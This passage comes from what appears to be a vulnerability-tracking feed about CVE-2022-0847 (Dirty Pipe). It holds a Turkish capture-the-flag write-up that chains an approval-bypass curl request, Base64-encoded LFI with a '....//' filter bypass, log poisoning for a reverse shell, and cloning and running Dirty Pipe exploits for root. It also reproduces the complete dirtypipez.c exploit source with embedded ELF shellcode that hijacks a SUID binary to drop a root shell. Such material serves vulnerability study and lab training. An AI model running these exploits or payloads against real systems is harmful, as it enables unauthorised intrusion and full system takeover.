Enjeksiyonu (SQLi) denemeleri ve kaba kuvvet (brute-force) sald\u0131r\u0131lar\u0131 yapt\u0131m ancak sistem bu basit hamleleri savu\u015fturdu.\n\n> *Not: Sisteme normal bir kullan\u0131c\u0131 olarak kay\u0131t olup ilk bayra\u011f\u0131 elde etmi\u015f olsak da, as\u0131l kritik b\u00f6lgeye ge\u00e7i\u015f i\u00e7in bir t\u0131kan\u0131kl\u0131k ya\u015f\u0131yorduk.*\n\n**Y\u00f6nlendirme Zafiyeti ve S\u0131zan Bilgiler:**\nTrafi\u011fi Burp Suite \u00fczerinden analiz ederken kritik bir detay g\u00f6z\u00fcme \u00e7arpt\u0131. `/webadmin/index.php` sayfas\u0131 bizi 302 koduyla d\u0131\u015far\u0131 at\u0131yordu ancak y\u00f6nlendirme ger\u00e7ekle\u015fmeden hemen \u00f6nce yan\u0131t g\u00f6vdesinde (response body) sayfan\u0131n i\u00e7eriklerini s\u0131zd\u0131r\u0131yordu. Bu s\u0131z\u0131nt\u0131 sayesinde hem bir sonraki bayra\u011f\u0131 hem de gizli bir y\u00f6netim sayfas\u0131n\u0131n adresini yakalad\u0131m: `/webadmin/tables/datatables.php`.\n\n**Mant\u0131k Hatas\u0131 (Logic Flaw):**\nKendi hesab\u0131mdaki \"Y\u00f6netici Onay\u0131 Bekliyor\" durumunu a\u015fmak i\u00e7in buldu\u011fum yeni adrese `GET` iste\u011fi att\u0131m. Sayfan\u0131n kaynak kodlar\u0131n\u0131 incelerken, arka planda \u00e7al\u0131\u015fan ve do\u011frudan `/sendFile.php` adresine veri g\u00f6nderen gizli bir form tespit ettim. \n\nFormu `curl` komutu ile manip\u00fcle ederek, sistemin beni `orion` kullan\u0131c\u0131s\u0131 olarak onaylamas\u0131n\u0131 sa\u011flad\u0131m:\n\n```bash\ncurl -X POST -d \"username=orion\" [http://impact.hv/sendFile.php](http://impact.hv/sendFile.php)\n\n```\n\nBu hamle sonras\u0131nda hesab\u0131m \"Onayl\u0131\" duruma ge\u00e7ti ve eri\u015fime kapal\u0131 olan `http://impact.hv/profile.php` sayfas\u0131 art\u0131k kullan\u0131m\u0131mdayd\u0131.\n\n---\n\n## Faz 3: LFI Filtrelerini A\u015fmak ve Ters Ba\u011flant\u0131 (Reverse Shell)\n\nProfil sayfas\u0131ndaki etkile\u015fimli butonlar\u0131n her biri sunucuya \u015fu formatta bir istek g\u00f6nderiyordu:\n`http://impact.hv/search.php?name=dmVydGV4dGVjaG5vbG9naWVzLnNxbA`\n\nBuradaki `name` parametresinin Base64 ile \u015fifrelendi\u011fini fark etmek zor olmad\u0131. Hemen bir LFI (Yerel Dosya \u00c7a\u011f\u0131rma) denemesi yapmak istedim ancak sunucu standart `../` dizin atlama karakterlerini engelliyordu.\n\n**Filtre Atlatma (Bypass):**\nFiltreyi \u015fa\u015f\u0131rtmak i\u00e7in `....//` dizilimini kulland\u0131m. Sunucu bu ifadeyi i\u015flerken aradaki noktalar\u0131 ve e\u011fik \u00e7izgileri silip geriye standart bir `../` b\u0131rakarak kendi filtresini kendi kendine k\u00f6r ediyordu.\n\n* **Hedef Dosya:** `/var/log/apache2/access.log`\n* **Base64 \u00c7evirisi:** `Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c=`\n\n```http\nGET /search.php?name=Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c= HTTP/1.1\n\n```\n\n**Log Zehirlenmesi (Log Poisoning) ile RCE:**\nLog dosyas\u0131n\u0131 okuyabildi\u011fimi kan\u0131tlad\u0131ktan sonra (boyut sorunlar\u0131 y\u00fcz\u00fcnden makineyi yeniden ba\u015flatmam gerekti), loglar\u0131n i\u00e7ine zararl\u0131 bir PHP kodu enjekte etmeye karar verdim. `curl` arac\u0131yla hedef sunucuya giderken \"User-Agent\" k\u0131sm\u0131na ters ba\u011flant\u0131 (reverse shell) kodumu yerle\u015ftirdim:\n\n```bash\ncurl -A \" '); ?>\" [http://impact.hv/curl](http://impact.hv/curl) \n\n```\n\nHemen ard\u0131ndan netcat ile dinlemeye ge\u00e7ip, yukar\u0131daki LFI iste\u011fini tekrar tetikledi\u011fimde, Apache log dosyas\u0131 \u00e7al\u0131\u015ft\u0131r\u0131ld\u0131 ve i\u00e7erisindeki PHP kodum sayesinde sunucuda komut \u00e7al\u0131\u015ft\u0131rma yetkisi (Shell) kazand\u0131m.\n\n\u0130lk i\u015f olarak hedef bayra\u011f\u0131 okudum:\n\n```bash\ncat /home/impact/targets.txt\n\n```\n\n---\n\n## Faz 4: \u00c7ekirdek \u0130stismar\u0131 ve Mutlak G\u00fc\u00e7 (Privilege Escalation)\n\nD\u00fc\u015f\u00fck yetkili bir kullan\u0131c\u0131 olarak i\u00e7erideyiz ancak hedefimiz her zaman `root` olmakt\u0131r. Sistemin kernel s\u00fcr\u00fcm\u00fcn\u00fc kontrol etti\u011fimde, Linux tarihindeki en pop\u00fcler zafiyetlerden biri olan **Dirty Pipe (CVE-2022-0847)** i\u00e7in savunmas\u0131z oldu\u011funu g\u00f6rd\u00fcm.\n\nZafiyeti s\u00f6m\u00fcrmek i\u00e7in gerekli arac\u0131 GitHub \u00fczerinden hedef makineye \u00e7ektim ve derledim:\n\n```bash\n# Exploit'i indirip derleme a\u015famas\u0131\ngit clone [https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git)\ncd CVE-2022-0847-DirtyPipe-Exploits\nbash compile.sh\n\n# \u0130stismar\u0131 tetikleme (\u0130ki farkl\u0131 y\u00f6ntem)\n# Y\u00f6ntem 1: Do\u011frudan shell almak\n./exploit-1\n\n# Y\u00f6ntem 2: Root parolas\u0131n\u0131 manip\u00fcle ederek SUID \u00fczerinden ilerlemek\n./exploit-2 /usr/bin/passwd\n\n```\n\nExploit ba\u015far\u0131yla \u00e7al\u0131\u015ft\u0131ktan sonra komut sat\u0131r\u0131nda `#` i\u015faretini g\u00f6rd\u00fcm. Sistem art\u0131k tamamen kontrol\u00fcm alt\u0131ndayd\u0131.", "creation_timestamp": "2026-05-17T19:21:34.000000Z"}, {"uuid": "a72d2103-87bd-44c7-bfc1-bc0a7434040c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/dWAxU1ge2MMwuw46phB7VgOs48d5lZguj7Rq-U8NxUc5K0Y", "content": "", "creation_timestamp": "2025-04-16T02:41:12.000000Z"}, {"uuid": "cd4a708d-2da9-4ac8-8916-56904c056d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/spynika/19d78c3423bdca400fa5118ff44c445b", "content": "//\n// dirtypipez.c\n//\n// hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn\n// a root shell. (and attempts to restore the damaged binary as well)\n//\n// Wow, Dirty CoW reloaded!\n//\n// -- blasty  // 2022-03-07\n/* SPDX-License-Identifier: GPL-2.0 */\n/*\n * Copyright 2022 CM4all GmbH / IONOS SE\n *\n * author: Max Kellermann \n *\n * Proof-of-concept exploit for the Dirty Pipe\n * vulnerability (CVE-2022-0847) caused by an uninitialized\n * \"pipe_buffer.flags\" variable.  It demonstrates how to overwrite any\n * file contents in the page cache, even if the file is not permitted\n * to be written, immutable or on a read-only mount.\n *\n * This exploit requires Linux 5.8 or later; the code path was made\n * reachable by commit f6dd975583bd (\"pipe: merge\n * anon_pipe_buf*_ops\").  The commit did not introduce the bug, it was\n * there before, it just provided an easy way to exploit it.\n *\n * There are two major limitations of this exploit: the offset cannot\n * be on a page boundary (it needs to write one byte before the offset\n * to add a reference to this page to the pipe), and the write cannot\n * cross a page boundary.\n *\n * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\\nssh-ed25519 AAA......\\n'\n *\n * Further explanation: https://dirtypipe.cm4all.com/\n */\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n// small (linux x86_64) ELF file matroshka doll that does;\n//   fd = open(\"/tmp/sh\", O_WRONLY | O_CREAT | O_TRUNC);\n//   write(fd, elfcode, elfcode_len)\n//   chmod(\"/tmp/sh\", 04755)\n//   close(fd);\n//   exit(0);\n//\n// the dropped ELF simply does:\n//   setuid(0);\n//   setgid(0);\n//   execve(\"/bin/sh\", [\"/bin/sh\", NULL], [NULL]);\nunsigned char elfcode[] = {\n    /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\n    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,\n    0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,\n    0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,\n    0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,\n    0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,\n    0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,\n    0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,\n    0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,\n    0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,\n    0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n    0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,\n    0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n    0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n    0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\n    0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,\n    0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,\n    0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,\n    0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,\n    0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,\n    0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00\n};\n/**\n * Create a pipe where all \"bufs\" on the pipe_inode_info ring have the\n * PIPE_BUF_FLAG_CAN_MERGE flag set.\n */\nstatic void prepare_pipe(int p[2])\n{\n    if (pipe(p)) abort();\n    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);\n    static char buffer[4096];\n    /* fill the pipe completely; each pipe_buffer will now have\n       the PIPE_BUF_FLAG_CAN_MERGE flag */\n    for (unsigned r = pipe_size; r > 0;) {\n        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n        write(p[1], buffer, n);\n        r -= n;\n    }\n    /* drain the pipe, freeing all pipe_buffer instances (but\n       leaving the flags initialized) */\n    for (unsigned r = pipe_size; r > 0;) {\n        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n        read(p[0], buffer, n);\n        r -= n;\n    }\n    /* the pipe is now empty, and if somebody adds a new\n       pipe_buffer without initializing its \"flags\", the buffer\n       will be mergeable */\n}\nint hax(char *filename, long offset, uint8_t *data, size_t len) {\n    /* open the input file and validate the specified offset */\n    const int fd = open(filename, O_RDONLY); // yes, read-only! :-)\n    if (fd < 0) {\n        perror(\"open failed\");\n        return -1;\n    }\n    struct stat st;\n    if (fstat(fd, &st)) {\n        perror(\"stat failed\");\n        return -1;\n    }\n    /* create the pipe with all flags initialized with\n       PIPE_BUF_FLAG_CAN_MERGE */\n    int p[2];\n    prepare_pipe(p);\n    /* splice one byte from before the specified offset into the\n       pipe; this will add a reference to the page cache, but\n       since copy_page_to_iter_pipe() does not initialize the\n       \"flags\", PIPE_BUF_FLAG_CAN_MERGE is still set */\n    --offset;\n    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);\n    if (nbytes < 0) {\n        perror(\"splice failed\");\n        return -1;\n    }\n    if (nbytes == 0) {\n        fprintf(stderr, \"short splice\\n\");\n        return -1;\n    }\n    /* the following write will not create a new pipe_buffer, but\n       will instead write into the page cache, because of the\n       PIPE_BUF_FLAG_CAN_MERGE flag */\n    nbytes = write(p[1], data, len);\n    if (nbytes < 0) {\n        perror(\"write failed\");\n        return -1;\n    }\n    if ((size_t)nbytes < len) {\n        fprintf(stderr, \"short write\\n\");\n        return -1;\n    }\n    close(fd);\n    return 0;\n}\nint main(int argc, char **argv) {\n    if (argc != 2) {\n        fprintf(stderr, \"Usage: %s SUID\\n\", argv[0]);\n        return EXIT_FAILURE;\n    }\n    char *path = argv[1];\n    uint8_t *data = elfcode;\n    int fd = open(path, O_RDONLY);\n    uint8_t *orig_bytes = malloc(sizeof(elfcode));\n    lseek(fd, 1, SEEK_SET);\n    read(fd, orig_bytes, sizeof(elfcode));\n    close(fd);\n    printf(\"[+] hijacking suid binary..\\n\");\n    if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {\n        printf(\"[~] failed\\n\");\n        return EXIT_FAILURE;\n    }\n    printf(\"[+] dropping suid shell..\\n\");\n    system(path);\n    printf(\"[+] restoring suid binary..\\n\");\n    if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {\n        printf(\"[~] failed\\n\");\n        return EXIT_FAILURE;\n    }\n    printf(\"[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\\n\");\n    system(\"/tmp/sh\");\n    return EXIT_SUCCESS;\n}", "creation_timestamp": "2026-05-18T02:19:14.000000Z"}]}